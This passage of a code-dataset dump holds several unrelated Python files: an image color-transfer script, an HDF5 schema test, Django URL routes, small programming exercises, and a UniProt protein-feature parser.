protocol: cv2 protocol (e.g. cv2.COLOR_RGB2LAB)\n :param protocol_reverse: cv2 protocol (e.g. cv2.COLOR_LAB2RGB)\n :param calc_channel: if False in certain dim, skip that channel\n :return image_transfered: color transfered image, a numpy array, uint8\n \"\"\"\n\n # if no mask, use whole image\n if type(image_mask) != np.ndarray:\n image_mask = np.ones((image.shape[0], image.shape[1])).astype(np.uint8) * 255\n if type(target_color_image_mask) != np.ndarray:\n target_color_image_mask = np.ones((target_color_image.shape[0], target_color_image.shape[1])).astype(np.uint8) * 255\n\n target_color_hsv = cv2.cvtColor(target_color_image, protocol)\n target_mean, target_std = cv2.meanStdDev(target_color_hsv, mask=target_color_image_mask)\n\n\n # if LAB channel, and its pure color, then set std to [10, 1, 1]\n if protocol == cv2.COLOR_RGB2LAB:\n target_std[0] = 10 if target_std[0] == 0 else target_std[0]\n target_std[1] = 1 if target_std[1] == 0 else target_std[1]\n target_std[2] = 1 if target_std[2] == 0 else target_std[2]\n\n\n image_hsv = cv2.cvtColor(image, protocol)\n image_transformed_hsv = color_transfer(image_hsv, image_mask, target_mean, target_std, calc_channel)\n image_transformed = cv2.cvtColor(image_transformed_hsv, protocol_reverse)\n\n return image_transformed\n\n\nif __name__ == '__main__':\n\n from get_mask import get_mask\n\n img_path = './data/img.png'\n img_mask_path = './data/img.json'\n target_color_img_path = './data/color.jpg'\n target_color_img_mask_path = './data/color.json'\n\n img = np.array(Image.open(img_path).convert('RGB'))\n img_mask = get_mask(img_path, img_mask_path)\n target_color_img = np.array(Image.open(target_color_img_path).convert('RGB'))\n target_color_img_mask = get_mask(target_color_img_path, target_color_img_mask_path)\n\n img_transformed = color_transfer_wrapper(img, target_color_img,\n cv2.COLOR_RGB2LAB, cv2.COLOR_LAB2RGB,\n image_mask=img_mask,\n target_color_image_mask=target_color_img_mask,\n calc_channel=[True, True, True])\n\n img_transformed_pil = Image.fromarray(img_transformed)\n img_transformed_pil.save('output.png')\n\n plt.figure(figsize=(20, 8))\n plt.subplot(151); plt.imshow(img); plt.title('image'); plt.axis('off')\n plt.subplot(152); plt.imshow(img_mask); plt.title('mask'); plt.axis('off')\n plt.subplot(153); plt.imshow(target_color_img); plt.title('target color'); plt.axis('off')\n plt.subplot(154); plt.imshow(target_color_img_mask); plt.title('target color mask'); plt.axis('off')\n plt.subplot(155); plt.imshow(img_transformed); plt.title('transformed'); plt.axis('off')\n plt.tight_layout()\n plt.savefig('output_concat.png')\n","sub_path":"pattern_changer/color_changer.py","file_name":"color_changer.py","file_ext":"py","file_size_in_byte":7990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"99565274","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# michael a.g. 
aïvázis \n# (c) 1998-2023 all rights reserved\n\n\n\"\"\"\nCheck that we can decorate groups with schema\n\"\"\"\n\n\ndef test():\n # support\n import pyre\n\n # declare the metadata group layout\n class Meta(pyre.h5.schema.group):\n \"\"\"\n A group of datasets in some HDF5 file\n \"\"\"\n\n # something simple\n id = pyre.h5.schema.int()\n id.__doc__ = \"a simple dataset\"\n\n # something a bit more complicated\n pols = pyre.h5.schema.strings()\n pols.default = \"HH\", \"VV\"\n pols.__doc__ = \"a dataset that's a container\"\n\n # and the main group layout\n class Group(pyre.h5.schema.group):\n \"\"\"\n The top level group\n \"\"\"\n\n # add the metadata\n meta = Meta()\n\n # now, make a group with this layout\n g = pyre.h5.api.group(at=\"/\", layout=Group())\n\n # it has no members\n assert tuple(g._pyre_contents) == ()\n # no subgroups\n assert tuple(g._pyre_groups()) == ()\n # no datasets\n assert tuple(g._pyre_datasets()) == ()\n # and no locations\n assert tuple(g._pyre_locations()) == ()\n\n # all done\n return g\n\n\n# main\nif __name__ == \"__main__\":\n # drive\n test()\n\n\n# end of file\n","sub_path":"tests/pyre.pkg/h5/api/group_subgroup.py","file_name":"group_subgroup.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"555010538","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('mangas/', views.mangas, name='mangas'),\n path('figuras/', views.figuras, name='figuras'),\n path('registro/', views.registro, name='registro'),\n path('listado-Mangakas/', views.listado_mangakas, name='listado_mangakas'),\n path('nuevo-mangaka/', views.crear_mangaka, name='crear_mangakas'),\n path('modificar-mangaka//', views.modificar_mangaka, name='modificar_mangaka'),\n path('eliminar-mangaka//', views.eliminar_mangaka, name='eliminar_mangaka'),\n path('listado-Mangas/', views.listado_mangas, name='listado_mangas'),\n path('nuevo-manga/', views.crear_mangas, name='crear_mangas'),\n path('modificar-manga//', views.modificar_mangas, name='modificar_mangas'),\n path('eliminar-manga//', views.eliminar_mangas, name='eliminar_mangas'),\n path('listado-Figuras/', views.listado_figuras, name='listado_figuras'),\n path('nuevo-figura/', views.crear_figuras, name='crear_figuras'),\n path('modificar-figura//', views.modificar_figura, name='modificar_figura'),\n path('eliminar-figura//', views.eliminar_figura, name='eliminar_figura'),\n path('contacto/' ,views.contacto, name='contacto'),\n path('listado-recetas/', views.listado_recetas, name='listado_recetas'),\n path('nueva-receta/', views.crear_recetas, name='nueva_receta'),\n path('modificar-recetas//', views.modificar_recetas, name='modificar_recetas'),\n path('eliminar-recetas//', views.eliminar_recetas, name='eliminar_recetas'),\n]\nurlpatterns +=[\n \n]","sub_path":"nenuko/catalogo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"527334480","text":"# -*- coding: utf-8 -*-\n\n\n# 08. 
Ciphertext\n# Implement a function cipher that converts each character of a given string according to the following spec.\n\n# Replace a lowercase letter with the character whose code is (219 - character code)\n# Output any other character unchanged\n# Use this function to encrypt and then decrypt an English message.\n\n# Reference\n# http://python.civic-apps.com/char-ord/\n\n\n\n\ndef cipher(chars,method):\n    # the mapping c -> chr(219 - ord(c)) sends a-z onto itself, so the same\n    # substitution performs both encryption and decryption\n    if method == \"encryption\":\n        return [chr(219 - ord(c)) if 97 <= ord(c) <= 122 else c for c in chars]\n    else:\n        return [chr(219 - ord(c)) if (219 - 122) <= ord(c) <= (219 - 97) else c for c in chars]\n\n\nprint(\"\".join(cipher(\"ABCabc123\",\"encryption\")))\nprint(\"\".join(cipher(\"ABCzyx123\",\"decryption\")))\n\n","sub_path":"chapter_1/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"425113476","text":"class Mario():\n    def __init__(self, star):\n        self.mario_x = 0\n        self.mario_y = 0\n\n        self.star_x = star[0]\n        self.star_y = star[1]\n\n        self.points = 0\n\n    def check_star(self):\n        if (self.mario_x == self.star_x and self.mario_y == self.star_y):\n            self.points += 1\n\n    def down(self):\n        self.mario_y -= 1\n        self.check_star()\n\n    def left(self):\n        self.mario_x -= 1\n        self.check_star()\n\n    def up(self):\n        self.mario_y += 1\n        self.check_star()\n\n    def right(self):\n        self.mario_x += 1\n        self.check_star()\n\n    def simulate(self, moves):\n        mario = Mario([0, 2])\n        for move in moves:\n            if move == 'U':\n                mario.up()\n            elif move == 'L':\n                mario.left()\n            elif move == 'D':\n                mario.down()\n            elif move == 'R':\n                mario.right()\n        return mario.points\n\n\nwith open('../9/moves-1.txt') as f:\n    moves = f.readline()\n    print(Mario((0, 2)).simulate(moves))\n","sub_path":"session-9/homework_solution/9-2.py","file_name":"9-2.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"352877341","text":"\"\"\"\nReturn the root node of a binary search tree that matches the given preorder traversal.\n\n(Recall that a binary search tree is a binary tree where for every node, any descendant of node.left has a value < node.val, and any descendant of node.right has a value > node.val. 
Also recall that a preorder traversal displays the value of the node first, then traverses node.left, then traverses node.right.)\n\nIt's guaranteed that for the given test cases there is always possible to find a binary search tree with the given requirements.\n\nExample 1:\n Input: [8,5,1,7,10,12]\n Output: [8,5,10,1,7,null,12]\n\nConstraints:\n 1 <= preorder.length <= 100\n 1 <= preorder[i] <= 10^8\n The values of preorder are distinct.\n\"\"\"\n\nfrom binarytree import Node\ndef bstFromPreorder(preorder):\n node = Node(preorder[0])\n if len(preorder) == 1:\n return node\n right_tree_root = None\n for i in range(1, len(preorder)):\n if preorder[i] > preorder[0]:\n right_tree_root = i\n break\n if right_tree_root != None:\n if right_tree_root >= 2:\n node.left = bstFromPreorder(preorder[1: right_tree_root])\n node.right = bstFromPreorder(preorder[right_tree_root:])\n else:\n node.left = bstFromPreorder(preorder[1:])\n return node\n\np1 = [8,5,1,7,10,12]\nprint(bstFromPreorder(p1))\n","sub_path":"LeetCode-Python/1008 Construct Binary Search Tree from Preorder Traversal.py","file_name":"1008 Construct Binary Search Tree from Preorder Traversal.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"301304935","text":"#!/usr/bin/env python \n\"\"\"Parses the XML scheme of a uniprot protein and provides a python API \nfor quering and accessing the results \n\"\"\"\n# load the modules \nfrom __future__ import annotations\nimport numpy as np \nfrom Bio import SeqIO\nimport urllib\nimport os \nfrom typing import List, Tuple, Dict, Union\nclass Features:\n r\"\"\"The class provides a template for the features associated with a protein. \\\n The following features are associated with the protein \\ \n #signal peptide: dict \\\n The range of the signal peptides, if the protein has no signal, for example, a globular \\\n cytologic protein. None is used as a default, placeholder \\\n value. \\ \n #chains:dict \\ \n the chains making up the mature protein, the protein should at least have one chain. \\ \n #domain: dict\\ \n the known domains in the protein, if no domain is defined, None is used. \\ \n #modification sites: nested dict \\ \n that contains information about the PTM sites, glycosylation site and disulfide bonds. \\ \n #sequence variances: dict \\ \n which contains information about the sequence variants of a protein structure. \\ \n #split variance: dict \\ \n which contain known splice variants \\ \n ** Notes: Although disulfide bond is not a PTMs, it is being treated as a \\ \n one here to simplify the workflow. 
\\ \n \"\"\"\n def __init__(self,uniprot_id:str, temp_dir: str = None)->Features:\n \"\"\"Download the features associated with a protein from uniprot and then parse the results using SeqIO to extract the features\n \n :param uniprot_id: Uniprot id to download its XML scheme from Uniprot \n :type uniprot_id: str \n :param temp_dir: a temporary directory to download the XML scheme to it, if not provided files are download to the current working directory, defaults to None.\n :type temp_dir: str\n \"\"\"\n # download the files \n if temp_dir is None: \n temp_dir=\".\" \n # define the file path \n file_path: str = os.path.join(temp_dir,f\"{uniprot_id}.xml\")\n try: \n urllib.request.urlretrieve(f\"https://www.uniprot.org/uniprot/{uniprot_id}.xml\", file_path) \n except urllib.error.HTTPError: \n raise IOError(\"Downloading the provided fail, Check your provided uniprot id\")\n # read the sequence object \n record: SeqIO.SeqRecord = SeqIO.read(file_path,\"uniprot-xml\")\n # fill the provided record \n self.extracted_features=dict()\n # parse the features in the record.feature object\n for feature in record.features:\n # extract sequences signal peptide\n if feature.qualifiers[\"type\"]==\"signal peptide\":\n # Try to extract the start and end position for the chain\n # if this could no be extracted None is used as a default value\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"SignalPeptide\"]={\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n # extract the chain information\n elif feature.qualifiers[\"type\"]==\"chain\":\n if \"Chains\" in self.extracted_features.keys():\n chainIdx=len(self.extracted_features[\"Chains\"]) # get the chain index\n chainName=\"chain_number_\"+str(chainIdx)\n # Try to extract the start and end position for the chain\n # if this colud no be extracted None is used as a default value\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n \n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"Chains\"][chainName]={\n \"chainId\":feature.id,\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n else:\n \n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n \n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n \n self.extracted_features[\"Chains\"]={\n \"chain_number_0\":{\n \"chainId\":feature.id,\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }}\n # extract the domain information\n elif feature.qualifiers[\"type\"]==\"domain\":\n if \"Domains\" in self.extracted_features.keys():\n self.extracted_features[\"Domains\"][\n feature.qualifiers[\"description\"]]={\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)}\n else: \n self.extracted_features[\"Domains\"]={\n feature.qualifiers[\"description\"]:{\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n }\n # extract transmembrane features:\n elif feature.qualifiers[\"type\"]=='transmembrane region':\n if \"transmembrane_region\" in self.extracted_features.keys():\n self.extracted_features[\"transmembrane_region\"].append((int(feature.location.start),int(feature.location.end)))\n else:\n self.extracted_features[\"transmembrane_region\"]=[(int(feature.location.start),int(feature.location.end))]\n # extract the topological 
information:\n elif feature.qualifiers[\"type\"]==\"modified residue\":\n if \"PTMs\" in self.extracted_features.keys():\n if \"Modifications\" in self.extracted_features[\"PTMs\"].keys():\n modificationIdx=len(self.extracted_features[\"PTMs\"][\n \"Modifications\"])\n modificationName=\"SeqModification_num_\"+str(modificationIdx)\n self.extracted_features[\"PTMs\"][\"Modifications\"][\n modificationName]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"PTMs\"][\"Modifications\"]={}\n self.extracted_features[\"PTMs\"][\"Modifications\"][\n \"SeqModification_num_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else: \n self.extracted_features[\"PTMs\"]={}\n self.extracted_features[\"PTMs\"][\"Modifications\"]={}\n self.extracted_features[\"PTMs\"][\"Modifications\"][\n \"SeqModification_num_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract and add glycosylation sites to the features class\n elif feature.qualifiers[\"type\"]==\"glycosylation site\":\n if \"PTMs\" in self.extracted_features.keys():\n if \"GlycoSite\" in self.extracted_features[\"PTMs\"].keys():\n glycositeIdx=len(self.extracted_features[\"PTMs\"][\"GlycoSite\"])\n glyco_site_name=\"Glyco_Site_number_\"+str(glycositeIdx)\n self.extracted_features[\"PTMs\"][\"GlycoSite\"][\n glyco_site_name]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"PTMs\"][\"GlycoSite\"]={}\n self.extracted_features[\"PTMs\"][\"GlycoSite\"][\n \"Glyco_Site_number_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"PTMs\"]={}\n self.extracted_features[\"PTMs\"][\"GlycoSite\"]={}\n self.extracted_features[\"PTMs\"][\"GlycoSite\"][\n \"Glyco_Site_number_0\"]={\n \"Name\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract and add disulfide site to the feature class\n elif feature.qualifiers[\"type\"]==\"disulfide bond\":\n if \"PTMs\" in self.extracted_features.keys():\n if \"DisulfideBond\" in self.extracted_features[\"PTMs\"].keys():\n disulfideBondIdx=len(self.extracted_features[\"PTMs\"][\"DisulfideBond\"])\n disulfide_site_name=\"disulfide_site_number_\"+str(disulfideBondIdx)\n # try to extract the start and the end position.\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"][\n disulfide_site_name]={\n \"Name\":feature.qualifiers[\"type\"],\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n else:\n try:\n start_index=int(feature.location.start)\n except(TypeError):\n start_index=None\n try:\n end_index=int(feature.location.end)\n except(TypeError):\n end_index=None\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"]={}\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"][\n \"disulfide_site_number_0\"]={\n \"Name\":feature.qualifiers[\"type\"],\n \"startIdx\":start_index,\n \"endIdx\":end_index\n }\n else:\n 
self.extracted_features[\"PTMs\"]={}\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"]={}\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"][\n \"disulfide_site_number_0\"]={\n \"Name\":feature.qualifiers[\"type\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract sequence variant from the protein sequence:\n elif feature.qualifiers[\"type\"]==\"sequence variant\":\n if \"SeqVar\" in self.extracted_features.keys():\n varient_index=len( self.extracted_features[\"SeqVar\"])\n varient_name=\"Sequence_varient_number_\"+str(varient_index)\n # check if the feature has a description entrey\n if \"description\" in feature.qualifiers.keys():\n snp_id=feature.qualifiers[\"description\"]\n else:\n snp_id=None\n # check if the feature has a original entrey\n if \"original\" in feature.qualifiers.keys():\n original_amino_acid=feature.qualifiers[\"original\"]\n else:\n original_amino_acid=None\n # check if the feature has a varient entrey\n if \"variation\" in feature.qualifiers.keys():\n varient_amino_acid=feature.qualifiers[\"variation\"]\n else:\n varient_amino_acid=None\n # fill the entries\n self.extracted_features[\"SeqVar\"][varient_name]={\n \"VarientId\":feature.qualifiers[\"id\"],\n \"SNP_Id\":snp_id,\n \"original\":original_amino_acid,\n \"variation\":varient_amino_acid,\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else:\n self.extracted_features[\"SeqVar\"]={}\n if \"description\" in feature.qualifiers.keys():\n snp_id=feature.qualifiers[\"description\"]\n else:\n snp_id=None\n # check if the feature has a description entrey\n if \"description\" in feature.qualifiers.keys():\n snp_id=feature.qualifiers[\"description\"]\n else:\n snp_id=None\n # check if the feature has a original entrey\n if \"original\" in feature.qualifiers.keys():\n original_amino_acid=feature.qualifiers[\"original\"]\n else:\n original_amino_acid=None\n # check if the feature has a varient entrey\n if \"variation\" in feature.qualifiers.keys():\n varient_amino_acid=feature.qualifiers[\"variation\"]\n else:\n varient_amino_acid=None\n self.extracted_features[\"SeqVar\"][\n \"Sequence_varient_number_0\"]={\n \"VarientId\":feature.qualifiers[\"id\"],\n \"SNP_Id\":snp_id,\n \"original\":original_amino_acid,\n \"variation\":varient_amino_acid,\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # extract splice vaients from the protein sequences: \n elif feature.qualifiers[\"type\"]==\"splice variant\":\n if \"SpliceVar\" in self.extracted_features.keys():\n SpliceVarIdx=len(self.extracted_features[\"SpliceVar\"])\n spliceVarient_name=\"splice_varient_number_\"+str(SpliceVarIdx)\n self.extracted_features[\"SpliceVar\"][spliceVarient_name]={\n \"Name\":feature.qualifiers[\"id\"],\n \"Isoform\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n else: \n self.extracted_features[\"SpliceVar\"]={}\n self.extracted_features[\"SpliceVar\"][\n \"splice_varient_number_0\"]={\n \"Name\":feature.qualifiers[\"id\"],\n \"Isoform\":feature.qualifiers[\"description\"],\n \"startIdx\":int(feature.location.start),\n \"endIdx\":int(feature.location.end)\n }\n # fill in the empty object with None:\n if \"SignalPeptide\" not in self.extracted_features.keys():\n self.extracted_features[\"SignalPeptide\"]=None\n if \"Chains\" not in self.extracted_features.keys():\n self.extracted_features[\"Chains\"]=None\n if \"Domains\" not in 
self.extracted_features.keys():\n self.extracted_features[\"Domains\"]=None\n if \"PTMs\" not in self.extracted_features.keys():\n self.extracted_features[\"PTMs\"]=None\n else:\n if \"Modifications\" not in self.extracted_features[\"PTMs\"].keys():\n self.extracted_features[\"PTMs\"][\"Modifications\"]=None \n if \"GlycoSite\" not in self.extracted_features[\"PTMs\"].keys():\n self.extracted_features[\"PTMs\"][\"GlycoSite\"]=None \n if \"DisulfideBond\" not in self.extracted_features[\"PTMs\"].keys():\n self.extracted_features[\"PTMs\"][\"DisulfideBond\"]=None \n if \"SeqVar\" not in self.extracted_features.keys():\n self.extracted_features[\"SeqVar\"]=None\n if \"SpliceVar\" not in self.extracted_features.keys():\n self.extracted_features[\"SpliceVar\"]=None\n if 'transmembrane_region' not in self.extracted_features.keys():\n self.extracted_features[\"transmembrane_region\"]=None\n return \n # accessor methods:\n def has_signal_peptide(self)->bool:\n \"\"\"\n :return: True if the protein has a signal peptide and False other wise.\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"SignalPeptide\"]==None:\n return False\n return True\n \n def get_signal_peptide_index(self)->Tuple[int,int]:\n \"\"\"\n :return: The Index of the signal-peptide in the protein, if not signal peptide is defined, it returns None\n :rtype: Tuple[int,int]\n \"\"\"\n if self.extracted_features[\"SignalPeptide\"]==None:\n return None,None\n startIdx=self.extracted_features[\"SignalPeptide\"][\"startIdx\"]\n endIdx=self.extracted_features[\"SignalPeptide\"][\"endIdx\"]\n return startIdx,endIdx\n \n def has_chains(self)->bool:\n \"\"\"\n :return: True if the protein has/have chain/chains as feature and False otherwise.\n :rtype: [type]\n \"\"\"\n if self.extracted_features[\"Chains\"]==None:\n return False\n return True\n \n def get_number_chains(self) -> int:\n \"\"\"\n :return: The number of chains in the protein. 
if no chain is defined it returns zero.\n :rtype: int\n \"\"\"\n if not self.has_chains():\n return 0\n return len(self.extracted_features[\"Chains\"])\n \n def get_chains(self)->Dict[Dict[str,Union[str,int]]]:\n \"\"\"\n :return: A dictionary that contains the chains of the protein, if no chain is defined it return None\n :rtype: Dict[Dict[str,Union[str,int]]]\n \"\"\"\n return self.extracted_features[\"Chains\"]\n \n def has_transmembrane_domains(self)->bool:\n \"\"\"\n Returns:\n bool: True if the protein has transmembrane region and false otherwise\n \"\"\"\n return self.extracted_features[\"transmembrane_region\"]!=None\n\n def get_transmembrane_regions(self)->List[Tuple[int,int]]:\n \"\"\"return a list containing the boundaries of transmembrane regions in the protein \n\n Returns:\n List[Tuple[int,int]]: a list containing the boundaries of transmembrane regions in the protein \n \"\"\"\n return self.extracted_features[\"transmembrane_region\"]\n \n def get_num_transmembrane_regions(self)->int:\n \"\"\"Return the number of transmembrane regions on the protein \n\n Returns:\n int: Return the number of transmembrane regions on the protein\n \"\"\"\n print()\n if self.extracted_features[\"transmembrane_region\"]!=None:\n return len(self.get_transmembrane_regions())\n return 0\n\n def has_domains(self)->bool: \n \"\"\"\n :return: True if the protein has a defined domain/domains, otherwise it return False.\n :rtype: bool \n \"\"\"\n return self.extracted_features[\"Domains\"]!=None\n \n def get_number_domains(self)->int:\n \"\"\"\n :return: The number of domains a protein has, if no domain is defined it returns zero.\n :rtype: int\n \"\"\"\n if self.extracted_features[\"Domains\"] ==None:\n return 0\n return len(self.extracted_features[\"Domains\"])\n \n def get_domains(self)->Dict[str, Dict[str, int]]:\n \"\"\"\n :return: The domains defined in the protein sequence, if no domain is defined it returns None.\n :rtype: Dict[str, Dict[str, int]]\n \"\"\"\n return self.extracted_features[\"Domains\"]\n \n def has_PTMs(self)->bool:\n \"\"\"\n :return:True if the protein has a PTMs and False other wise\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"PTMs\"] ==None:\n return False\n return True\n\n def has_disulfide_bond(self)->bool:\n \"\"\"\n :return: True is the protein has disulfide and False other wise\n :rtype: bool\n \"\"\"\n if self.has_PTMs():\n if self.extracted_features[\"PTMs\"][\"DisulfideBond\"]==None:\n return False\n else: \n return True\n return False\n \n def has_glycosylation_site(self)->bool:\n \"\"\"\n :return: True if the protein has a glycosylation site and False otherwise.\n :rtype: [type]\n \"\"\"\n if self.has_PTMs():\n if self.extracted_features[\"PTMs\"][\"GlycoSite\"] == None:\n return False\n else:\n return True\n return False\n \n def has_site_modifications(self)->bool:\n \"\"\"\n :return: True if the protein has a modification site and False otherwise\n :rtype: bool\n \"\"\"\n if self.has_PTMs():\n if self.extracted_features[\"PTMs\"][\"Modifications\"] == None:\n return False\n else:\n return True\n return False\n \n def get_PTMs(self)->Dict[str,Dict[str,Dict[str,Union[str,int]]]]:\n \"\"\"\n :return: a nested dictionary that contains the PTMs found within the protein \\\n the PTMs are classified into three main categories:\n\n 1- Modifications: which is the generic case and contain information \\\n about any sequence modification beside disulfide bonds and glycosylation.\n \n 2- glycosylation: contains information about glycosylation sites\n \n 3- 
DisulfideBond: contains information about disulfide bond\n\n :rtype: Dict[str,Dict[str,Dict[str,Union[str,int]]]]\n \"\"\"\n return self.extracted_features[\"PTMs\"]\n \n def get_PTMs_modifications(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: The generic modifications found on the protein. If the protein has no PTM, the function returns None.\n :rtype: Dict[str,Dict[str,Union[str,int]]]\n \"\"\"\n if self.extracted_features[\"PTMs\"] is None: return None\n if \"Modifications\" in self.extracted_features[\"PTMs\"].keys():\n return self.extracted_features[\"PTMs\"][\"Modifications\"]\n return None\n \n def get_PTMs_glycosylation(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: The glycosylation sites found on the protein. If the protein has no glycosylation sites, the function returns None.\n :rtype: [type]\n \"\"\"\n if self.extracted_features[\"PTMs\"] is None: return None \n return self.extracted_features[\"PTMs\"][\"GlycoSite\"]\n \n def get_disulfide_bonds(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: The disulfide sites found on the protein. If the protein has no disulfide sites, the function returns None\n :rtype: [type]\n \"\"\"\n if self.extracted_features[\"PTMs\"] is None: return None\n return self.extracted_features[\"PTMs\"][\"DisulfideBond\"]\n \n def get_number_PTMs(self)->int:\n \"\"\"\n :return: The number of PTMs the sequence has, this include di-sulfide bonds. See Note1 for more details. \\\n If the protein has no PTMs the function returns zero\n :rtype: int\n \"\"\"\n if not self.has_PTMs():\n return 0\n else:\n number_of_PTMs=self.get_number_modifications()+self.get_number_glycosylation_sites()+self.get_number_disulfide_bonds()\n return number_of_PTMs\n \n def get_number_modifications(self)->int:\n \"\"\"\n :return: Returns the total number of generic modifications found on the protein. 
\\\n if no modification is found it return 0\n :rtype: int\n \"\"\"\n if not self.has_site_modifications():\n return 0\n else:\n return len(self.get_PTMs_modifications())\n \n def get_number_glycosylation_sites(self)->int:\n \"\"\"\n :return: The number of glycosylation_sites the protein has, if the protein has no glycosylation sites, the function returns zero\n :rtype: int\n \"\"\"\n if not self.has_glycosylation_site():\n return 0\n else:\n return len(self.get_PTMs_glycosylation())\n \n def get_number_disulfide_bonds(self)->int:\n \"\"\"\n :return: The number of disulfide bonds the protein has, if the protein has no disulfide bonds, the function return zero.\n :rtype: int\n \"\"\"\n if not self.has_disulfide_bond():\n return 0\n else:\n return len(self.get_disulfide_bonds())\n \n def has_sequence_variants(self) ->bool:\n \"\"\"\n :return: True if the protein has a sequence variants, and False otherwise.\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"SeqVar\"] == None:\n return False\n else: \n return True\n \n def get_sequence_variants(self) -> Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: A dict object that contains all sequence variants within a protein, if the protein has no sequence variants the function returns None.\n :rtype: Dict[str,Dict[str,Union[str,int]]]\n \"\"\"\n return self.extracted_features[\"SeqVar\"]\n \n def get_number_sequence_variants(self)->int:\n \"\"\"\n :return: The number of sequence variants the protein has, if the protein has no sequence varient, the function returns 0.\n :rtype: int\n \"\"\"\n if not self.has_sequence_variants():\n return 0\n else:\n return len(self.get_sequence_variants())\n \n def has_splice_variants(self)->bool:\n \"\"\"\n :return: True if the sequence has a splice variants and False otherwise.\n :rtype: bool\n \"\"\"\n if self.extracted_features[\"SpliceVar\"]==None:\n return False\n else:\n return True\n \n def get_splice_variants(self)->Dict[str,Dict[str,Union[str,int]]]:\n \"\"\"\n :return: A dict object that contains the splice variants. 
If the protein has no splice variants the function returns None.\n :rtype: Dict[str,Dict[str,Union[str,int]]]\n \"\"\"\n return self.extracted_features[\"SpliceVar\"]\n \n def get_number_splice_variants(self)->int:\n \"\"\"\n :return: The number of slice variants in the protein, if the protein has no splice variants, the function returns zero.\n :rtype: int\n \"\"\"\n if not self.has_splice_variants():\n return 0\n else:\n return len(self.get_splice_variants())\n \n def summary(self)->Dict[str,Union[str,int]]:\n \"\"\"\n :return: The function return a dict object that summarizes the features of the protein.\n :rtype: Dict[str,Union[str,int]]\n \"\"\"\n summary=dict()\n summary[\"has_signal_peptide\"]=self.has_signal_peptide()\n summary[\"number_of_chains\"]=self.get_number_chains()\n summary[\"number_of_domains\"]=self.get_number_domains()\n summary[\"number_of_PTMs\"]=self.get_number_PTMs()\n summary[\"number_of_modifications\"]=self.get_number_modifications()\n summary[\"number_of_glycosylation_sites\"]=self.get_number_glycosylation_sites()\n summary[\"number_of_disulfide_bonds\"]=self.get_number_disulfide_bonds()\n summary[\"number_of_sequence_varients\"]=self.get_number_sequence_variants()\n summary[\"number_of_splice_varients\"]=self.get_number_splice_variants()\n summary[\"number_of_transmembrane_regions\"]=self.get_num_transmembrane_regions()\n return summary\n \n def __str__(self)->str:\n \"\"\"\n The string representation of the class\n Returns\n -------\n the string representation of the class\n \"\"\"\n summary=self.summary()\n string_rep=\"\"\" A protein feature instance with: {} chains, {} transmembrane regions, {} domains. {} PTMs, {} sequence variants and {} splice variants\"\"\".format(\n summary[\"number_of_chains\"],summary[\"number_of_transmembrane_regions\"],summary[\"number_of_domains\"],\n 